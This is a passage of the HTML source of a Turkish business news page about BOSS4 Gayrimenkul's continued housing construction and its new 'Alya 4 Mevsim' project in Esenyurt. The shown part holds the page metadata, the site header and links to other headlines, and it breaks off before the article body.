  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Ara vermeden ev yapmaya devam ediyor</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="BOSS4 Gayrimenkul Yönetim Kurulu Başkanı Abdülkadir Akkuş, inşaat çalışmalarına ara vermeden devam ettiklerini, yeni projeleriyle Esenyurt bölgesine de adım atmış olduklarını kaydetti. Akkuş &#039;Bugüne kadar genelde Beylikdüzü ve çevresinde yatırımlar yaptık. Şimdi farklı alanlara da açılıyoruz. Levent&#039;te devam eden ‘Alya Teras&#039;ın dışında, Esenyurt&#039;ta da ‘Alya 4 Mevsim&#039;i hayata geçiriyoruz&#039; dedi." />
<meta name="keywords" content="Boss4, Esenyurt&amp;#039;ta hayata geçiyor, Esenyurt, ‘Alya 4 Mevsim&amp;#039;de" />
<meta name="news_keywords" content="Boss4, Esenyurt&amp;#039;ta hayata geçiyor, Esenyurt, ‘Alya 4 Mevsim&amp;#039;de">
<meta name="author" content="Gazete Ekonomi, iş ve ekonomi dünyasındaki gelişmeleri bağımsızca aktaran haber siteniz." /><meta property="fb:admins" content="723011795" /><meta name="theme-color" content="#299aec"><meta property="og:site_name" content="Gazete Ekonomi, iş ve ekonomi dünyasındaki gelişmeleri bağımsızca aktaran haber siteniz." />
<meta property="og:title" content="Ara vermeden ev yapmaya devam ediyor" />
<meta property="og:description" content="BOSS4 Gayrimenkul Yönetim Kurulu Başkanı Abdülkadir Akkuş, inşaat çalışmalarına ara vermeden devam ettiklerini, yeni projeleriyle Esenyurt bölgesine de adım atmış olduklarını kaydetti. Akkuş &#039;Bugüne kadar genelde Beylikdüzü ve çevresinde yatırımlar yaptık. Şimdi farklı alanlara da açılıyoruz. Levent&#039;te devam eden ‘Alya Teras&#039;ın dışında, Esenyurt&#039;ta da ‘Alya 4 Mevsim&#039;i hayata geçiriyoruz&#039; dedi." />
  <meta property="og:image" content="http://www.gazeteekonomi.com/images/haberler/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" /><meta http-equiv="refresh" content="300" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Ara vermeden ev yapmaya devam ediyor" />
<meta name="twitter:url" content="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" />
<meta name="twitter:domain" content="http://www.gazeteekonomi.com/" />
<meta name="twitter:site" content="GazeteEkonomi" />
<meta name="twitter:title" content="Ara vermeden ev yapmaya devam ediyor" />
<meta name="twitter:description" content="BOSS4 Gayrimenkul Yönetim Kurulu Başkanı Abdülkadir Akkuş, inşaat çalışmalarına ara vermeden devam ettiklerini, yeni projeleriyle Esenyurt bölgesine de adım atmış olduklarını kaydetti. Akkuş “Bugüne kadar genelde Beylikdüzü ve çevresinde yatırımlar yaptık. Şimdi farklı alanlara da açılıyoruz. Levent’te devam eden ‘Alya Teras’ın dışında, Esenyurt’ta da ‘Alya 4 Mevsim’i hayata geçiriyoruz&quot; dedi." />
<meta name="twitter:image:src" content="http://www.gazeteekonomi.com/images/haberler/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" /><link rel="alternate" href="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.gazeteekonomi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.gazeteekonomi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.gazeteekonomi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.gazeteekonomi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html">
<link rel="amphtml" href="http://www.gazeteekonomi.com/amp/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html">
  <link rel="image_src" type="image/jpeg" href="http://www.gazeteekonomi.com/images/haberler/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" />
<meta property="og:image:width" content="625"/>
<meta property="og:image:height" content="325"/>
<meta itemprop="headline" content="Ara vermeden ev yapmaya devam ediyor" />
<meta itemprop="thumbnailUrl" content="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" />
<meta itemprop="articleSection" content="Emlak" name="section" />
<meta itemprop="dateCreated" content="2021-08-26T09:28:33+02:00" />
<meta itemprop="image" content="http://www.gazeteekonomi.com/images/haberler/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Boss4, Esenyurt&amp;#039;ta hayata geçiyor, Esenyurt, ‘Alya 4 Mevsim&amp;#039;de" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-160px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.gazeteekonomi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.13',
theme_path = 'http://www.gazeteekonomi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '7',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'GazeteEkonomi',
facebook_user = 'GztEkonomi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'adana',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-25522674-1',
facebook_login_aktif = 1;
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
        <style>
    body {padding-top:00px;}
    </style>
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

        <div class="header-top-block header-top-logo">
      <a href="http://www.gazeteekonomi.com/"><img src="http://www.gazeteekonomi.com/images/banner/gazeteekonomi-letter-logo-kucuk-26x26.png" alt="Ara vermeden ev yapmaya devam ediyor" style="margin-top: -4px;"></a>
    </div>
    
        <div class="header-top-block header-top-weather">
      <div class="glyphicons white cloud">İstanbul <span class="degree">22</span></div>
    </div>
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.3771</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">9.8914</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">481.20</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1453.3</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/ekonomi/sel-ve-yangindaki-sigorta-bilgileri-aciklandi-h584244.html" title="Sel ve yangındaki sigorta bilgileri açıklandı" >Sel ve yangındaki sigorta bilgileri açıklandı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/gundem/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-maddi-kayip-var-h584231.html" title="Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık maddi kayıp var" >Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/ekonomi/enerjiyi-surdurulebilirlikten-aliyor-kazanci-paylasiyor-h584219.html" title="Enerjiyi sürdürülebilirlikten alıyor KAZANCI paylaşıyor" >Enerjiyi sürdürülebilirlikten alıyor KAZANCI paylaşıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/otomotiv/sifir-aracta-indirim-yuzde-16-olacak-ikinci-elde-dusus-az-sonra-h584195.html" title="Sıfır araçta indirim yüzde 16 olacak ikinci elde düşüş az sonra" >Sıfır araçta indirim yüzde 16 olacak ikinci elde düşüş az sonra</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/otomotiv/otv-karari-sektore-nefes-aldiracak-h584194.html" title="ÖTV kararı sektöre nefes aldıracak" >ÖTV kararı sektöre nefes aldıracak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/gundem/doganlar-holding-sel-felaketinde-zarar-goren-1000-ailenin-yarasini-sariyor-h584191.html" title="Doğanlar Holding sel felaketinde zarar gören 1000 ailenin yarasını sarıyor" >Doğanlar Holding sel felaketinde zarar gören 1000 ailenin yarasını...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/gundem/el-birligi-ile-yaralarimizi-saracagiz-dedi-1-milyon-tl-bagis-yapti-h584190.html" title="El birliği ile yaralarımızı saracağız dedi 1 milyon TL bağış yaptı" >El birliği ile yaralarımızı saracağız dedi 1 milyon TL bağış...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/teknoloji/turkiye-dijital-vergi-dairesi-kuruluyor-h584182.html" title="Türkiye Dijital Vergi Dairesi kuruluyor" >Türkiye Dijital Vergi Dairesi kuruluyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/gundem/bmnin-iklim-degisikligi-raporu-urkutucu-boyutlari-gozler-onune-seriyor-h584178.html" title="BM’nin iklim değişikliği raporu ürkütücü boyutları gözler önüne seriyor" >BM’nin iklim değişikliği raporu ürkütücü boyutları gözler önüne...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.gazeteekonomi.com/egitim/bekir-okan-isin-sirrini-anlatti-h584177.html" title="Bekir Okan, işin sırrını anlattı" >Bekir Okan, işin sırrını anlattı</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.gazeteekonomi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="bd7a26efbf266c5516c6113179cd18895b666548" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.gazeteekonomi.com/" class="logo"><img src="http://www.gazeteekonomi.com/images/banner/gazeteekonomi-main-txtonly.png" alt="Ara vermeden ev yapmaya devam ediyor" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.gazeteekonomi.com/" class="glyphicons home"></a>

            <a href="http://www.gazeteekonomi.com/galeri/" class="glyphicons picture">Galeri</a>
      
            <a href="http://www.gazeteekonomi.com/webtv/" class="glyphicons play">Video</a>
      
            <a href="http://www.gazeteekonomi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Gündem" href="http://www.gazeteekonomi.com/kategori/gundem" id="k2"    >Gündem</a>
<a title="Ekonomi-Finans" href="http://www.gazeteekonomi.com/kategori/ekonomi-finans" id="k19066"    >Ekonomi-Finans</a>
<a title="Ekonomi" href="http://www.gazeteekonomi.com/kategori/ekonomi" id="k4"    >Ekonomi</a>
<a title="Politika" href="http://www.gazeteekonomi.com/kategori/politika" id="k3"    >Politika</a>
<a title="Dünya" href="http://www.gazeteekonomi.com/kategori/dunya" id="k5"    >Dünya</a>
<a title="Teknoloji" href="http://www.gazeteekonomi.com/kategori/teknoloji" id="k4968"    >Teknoloji</a>
<a title="İş Dünyası" href="http://www.gazeteekonomi.com/kategori/is-dunyasi" id="k4150"    >İş Dünyası</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="Sektör" href="http://www.gazeteekonomi.com/kategori/sektor" id="k9170"    >Sektör</a>
<a title="Kent ve Yaşam" href="http://www.gazeteekonomi.com/kategori/kent-ve-yasam" id="k7"    >Kent ve Yaşam</a>
<a title="Günün Haberleri" href="http://www.gazeteekonomi.com/kategori/gunun-haberleri" id="k9168"    >Günün Haberleri</a>
<a title="Genel" href="http://www.gazeteekonomi.com/kategori/genel" id="k1"    >Genel</a>
<a title="Yeni Arayışlar" href="http://www.gazeteekonomi.com/kategori/yeni-arayislar" id="k6"    >Yeni Arayışlar</a>
<a title="Yazarlar" href="http://www.gazeteekonomi.com/kategori/yazarlar" id="k8"    >Yazarlar</a>
<a title="Sağlık" href="http://www.gazeteekonomi.com/kategori/saglik" id="k4151"    >Sağlık</a>
<a title="Turizm" href="http://www.gazeteekonomi.com/kategori/turizm" id="k4152"    >Turizm</a>
<a title="Kariyer" href="http://www.gazeteekonomi.com/kategori/kariyer" id="k4161"    >Kariyer</a>
<a title="Emlak" href="http://www.gazeteekonomi.com/kategori/emlak" id="k4162" class="current"   >Emlak</a>
<a title="Kültür Sanat" href="http://www.gazeteekonomi.com/kategori/kultur-sanat" id="k4795"    >Kültür Sanat</a>
<a title="Magazin" href="http://www.gazeteekonomi.com/kategori/magazin" id="k4969"    >Magazin</a>
<a title="Spor" href="http://www.gazeteekonomi.com/kategori/spor" id="k4970"    >Spor</a>
<a title="Türkiye" href="http://www.gazeteekonomi.com/kategori/turkiye" id="k4971"    >Türkiye</a>
<a title="Diğer Haberler" href="http://www.gazeteekonomi.com/kategori/diger-haberler" id="k10207"    >Diğer Haberler</a>
<a title="Güvenlik" href="http://www.gazeteekonomi.com/kategori/guvenlik" id="k19056"    >Güvenlik</a>
<a title="Eğitim" href="http://www.gazeteekonomi.com/kategori/egitim" id="k19057"    >Eğitim</a>
<a title="Dış Haberler" href="http://www.gazeteekonomi.com/kategori/dis-haberler" id="k19058"    >Dış Haberler</a>
<a title="Canlı Maç" href="http://www.gazeteekonomi.com/kategori/canli-mac" id="k19059"    >Canlı Maç</a>
<a title="Flaş Haber" href="http://www.gazeteekonomi.com/kategori/flas-haber" id="k19060"    >Flaş Haber</a>
<a title="English News" href="http://www.gazeteekonomi.com/kategori/english-news" id="k19063"    >English News</a>
<a title="Bilim Teknoloji" href="http://www.gazeteekonomi.com/kategori/bilim-teknoloji" id="k19067"    >Bilim Teknoloji</a>
<a title="Tarım" href="http://www.gazeteekonomi.com/kategori/tarim" id="k19257"    >Tarım</a>
<a title="Yerel" href="http://www.gazeteekonomi.com/kategori/yerel" id="k19268"    >Yerel</a>
<a title="Otomotiv" href="http://www.gazeteekonomi.com/kategori/otomotiv" id="k19269"    >Otomotiv</a>
<a title="Güncel" href="http://www.gazeteekonomi.com/kategori/guncel" id="k19426"    >Güncel</a>
<a title="Yemek" href="http://www.gazeteekonomi.com/kategori/yemek" id="k19428"    >Yemek</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/gundem/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-maddi-kayip-var-h584231.html" title="Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık maddi kayıp var"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-maddi-kayip-var_069bc.jpg" alt="Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık maddi kayıp var" />
Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık maddi kayıp var</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/gundem/batarya-uretimini-avucumuzun-ici-gibi-biliyoruz-h584220.html" title="Batarya üretimini avucumuzun içi gibi biliyoruz"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/batarya_uretimini_avucumuzun_ici_gibi_biliyoruz_h584220_c9f00.jpg" alt="Batarya üretimini avucumuzun içi gibi biliyoruz" />
Batarya üretimini avucumuzun içi gibi biliyoruz</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/gundem/doganlar-holding-sel-felaketinde-zarar-goren-1000-ailenin-yarasini-sariyor-h584191.html" title="Doğanlar Holding sel felaketinde zarar gören 1000 ailenin yarasını sarıyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/doganlar_holding_sel_felaketinde_zarar_goren_1000_ailenin_yarasini_sariyor_h584191_e53ee.jpeg" alt="Doğanlar Holding sel felaketinde zarar gören 1000 ailenin yarasını sarıyor" />
Doğanlar Holding sel felaketinde zarar gören 1000 ailenin yarasını sarıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/gundem/el-birligi-ile-yaralarimizi-saracagiz-dedi-1-milyon-tl-bagis-yapti-h584190.html" title="El birliği ile yaralarımızı saracağız dedi 1 milyon TL bağış yaptı"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/el-birligi-ile-yaralarimizi-saracagiz-dedi-1-milyon-tl-bagis-yapti_21554.png" alt="El birliği ile yaralarımızı saracağız dedi 1 milyon TL bağış yaptı" />
El birliği ile yaralarımızı saracağız dedi 1 milyon TL bağış yaptı</a>
</div>
</div></div><div class="katelement kat_k19066">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi-finans/oyun-basliyor-h584247.html" title="Oyun başlıyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/oyun_basliyor_h584247_0930a.jpg" alt="Oyun başlıyor" />
Oyun başlıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi-finans/sile-ye-hucum-h584243.html" title="Şile&#039;ye hücum"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/sile_ye_hucum_h584243_3d40d.jpg" alt="Şile&#039;ye hücum" />
Şile&#039;ye hücum</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi-finans/sutun-efesini-uretiyor-h584233.html" title="Sütün efesini üretiyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/sutun_efesini_uretiyor_h584233_0e701.jpg" alt="Sütün efesini üretiyor" />
Sütün efesini üretiyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi-finans/istanbul-guzellestiriyor-h584229.html" title="İstanbul güzelleştiriyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/istanbul_guzellestiriyor_h584229_50b21.jpg" alt="İstanbul güzelleştiriyor" />
İstanbul güzelleştiriyor</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html" title="Mermer fuarına damgasını vurdu"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/mermer_fuarina_damgasini_vurdu_h584249_5c4b5.jpg" alt="Mermer fuarına damgasını vurdu" />
Mermer fuarına damgasını vurdu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi/yenilenebilir-enerji-dediler-avrupa-dan-yatirimi-aldilar-h584248.html" title="Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/yenilenebilir_enerji_dediler_avrupa_dan_yatirimi_aldilar_h584248_852b5.jpeg" alt="Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar" />
Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi/kripto-para-yorumu-yapacak-h584246.html" title="Kripto para yorumu yapacak"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/kripto_para_yorumu_yapacak_h584246_ac3b0.jpeg" alt="Kripto para yorumu yapacak" />
Kripto para yorumu yapacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/ekonomi/model-fabrikalar-verimliligi-artiriyor-h584245.html" title="Model fabrikalar verimliliği artırıyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/model_fabrikalar_verimliligi_artiriyor_h584245_fb093.jpg" alt="Model fabrikalar verimliliği artırıyor" />
Model fabrikalar verimliliği artırıyor</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/politika/turkiyenin-sorunlarini-cozmeye-adayiz-h582793.html" title="Türkiye’nin sorunlarını çözmeye adayız"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2020/12/turkiyenin_sorunlari_cozmeye_adayiz_h582793_f36fe.jpg" alt="Türkiye’nin sorunlarını çözmeye adayız" />
Türkiye’nin sorunlarını çözmeye adayız</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/politika/deva-partisi-ankara-il-baskani-ali-guven-oldu-h581841.html" title="DEVA Partisi Ankara İl Başkanı Ali Güven Oldu"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2020/08/deva_partisi_ankara_il_baskani_ali_guven_oldu_h581841_f2dbf.jpg" alt="DEVA Partisi Ankara İl Başkanı Ali Güven Oldu" />
DEVA Partisi Ankara İl Başkanı Ali Güven Oldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/politika/tunc-soyer-tarkem-in-yeni-baskani-oldu-h581655.html" title="Tunç Soyer TARKEM&#039;in yeni başkanı oldu"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2020/07/tunc_soyer_tarkem_in_yeni_baskani_oldu_h581655_e0d08.gif" alt="Tunç Soyer TARKEM&#039;in yeni başkanı oldu" />
Tunç Soyer TARKEM&#039;in yeni başkanı oldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/politika/iste-istanbulda-ilce-ilce-chpnin-baskan-adaylar-h579401.html" title="İşte İstanbul’da ilçe ilçe CHP’nin başkan adaylar"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2019/12/iste_istanbulda_ilce_ilce_chpnin_baskan_adaylar_h579401_2943d.jpg" alt="İşte İstanbul’da ilçe ilçe CHP’nin başkan adaylar" />
İşte İstanbul’da ilçe ilçe CHP’nin başkan adaylar</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/dunya/en-anlamli-destek-h584188.html" title="En anlamlı destek"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/en_anlamli_destek_h584188_ea75a.jpg" alt="En anlamlı destek" />
En anlamlı destek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/dunya/is-dunyasi-afrika-ile-is-firsatlarini-konusuyor-h583970.html" title="İş dünyası Afrika ile iş fırsatlarını konuşuyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/06/is_dunyasi_afrika_ile_is_firsatlarini_konusuyor_h583970_b2b47.jpg" alt="İş dünyası Afrika ile iş fırsatlarını konuşuyor" />
İş dünyası Afrika ile iş fırsatlarını konuşuyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/dunya/kuresel-isinmada-uluslararasi-is-birligi-h583915.html" title="Küresel ısınmada uluslararası iş birliği"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/06/kuresel_isinmada_uluslararasi_is_birligi_h583915_0d294.jpg" alt="Küresel ısınmada uluslararası iş birliği" />
Küresel ısınmada uluslararası iş birliği</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/dunya/egd-meslek-buyugu-gazetecileri-anacak-h583497.html" title="EGD meslek büyüğü gazetecileri anacak"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/04/egd_meslek_buyugu_gazetecileri_anacak_h583497_bb311.jpg" alt="EGD meslek büyüğü gazetecileri anacak" />
EGD meslek büyüğü gazetecileri anacak</a>
</div>
</div></div><div class="katelement kat_k4968">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/teknoloji/e-donusum-cozumleri-icin-uyumsoft-u-secti-h584241.html" title="e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/e_donusum_cozumleri_icin_uyumsoft_u_secti_h584241_f78f9.jpeg" alt="e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti" />
e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/teknoloji/restoran-ve-kafeler-icin-e-adisyon-donemi-geliyor-h584237.html" title="Restoran ve kafeler için e-Adisyon dönemi geliyor"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/restoran_ve_kafeler_icin_e_adisyon_donemi_geliyor_h584237_077f4.jpeg" alt="Restoran ve kafeler için e-Adisyon dönemi geliyor" />
Restoran ve kafeler için e-Adisyon dönemi geliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/teknoloji/kuresel-marka-olmak-isteyen-startuplar-basvurmakta-gec-kalmasin-h584235.html" title="Küresel marka olmak isteyen startuplar başvurmakta geç kalmasın"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/kuresel_marka_olmak_isteyen_startuplar_basvurmakta_gec_kalmasin_h584235_da1a2.jpg" alt="Küresel marka olmak isteyen startuplar başvurmakta geç kalmasın" />
Küresel marka olmak isteyen startuplar başvurmakta geç kalmasın</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/teknoloji/e-ticaret-icin-bu-belgeleri-almayi-unutmayin-h584200.html" title="e-ticaret için bu belgeleri almayı unutmayın"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/e_ticaret_icin_bu_belgeleri_almayi_unutmayin_h584200_31372.png" alt="e-ticaret için bu belgeleri almayı unutmayın" />
e-ticaret için bu belgeleri almayı unutmayın</a>
</div>
</div></div><div class="katelement kat_k4150">
<div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/is-dunyasi/iste-polisan-in-yeni-hedefleri-h584242.html" title="İşte Polisan&#039;ın yeni hedefleri"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/iste_polisan_in_yeni_hedefleri_h584242_5b088.jpg" alt="İşte Polisan&#039;ın yeni hedefleri" />
İşte Polisan&#039;ın yeni hedefleri</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/is-dunyasi/cycenin-afrika-acilimi-h584236.html" title="CYCE’NİN Afrika açılımı"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/cycenin_afrika_acilimi_h584236_0d94c.jpeg" alt="CYCE’NİN Afrika açılımı" />
CYCE’NİN Afrika açılımı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/is-dunyasi/binlerce-alici-gelecek-h584210.html" title="Binlerce alıcı gelecek"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/binlerce_alici_gelecek_h584210_043a8.jpg" alt="Binlerce alıcı gelecek" />
Binlerce alıcı gelecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.gazeteekonomi.com/is-dunyasi/iklim-krizine-dur-demek-icin-temiz-enerjiye-gecilmeli-h584196.html" title="İklim krizine dur demek için temiz enerjiye geçilmeli"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/iklim_krizine_dur_demek_icin_temiz_enerjiye_gecilmeli_h584196_1866b.jpg" alt="İklim krizine dur demek için temiz enerjiye geçilmeli" />
İklim krizine dur demek için temiz enerjiye geçilmeli</a>
</div>
</div></div> </div>
  </div>
  
</div>
      <div id="flashaber" data-flash="fh584195" >
	<div class="f-kapsayici">
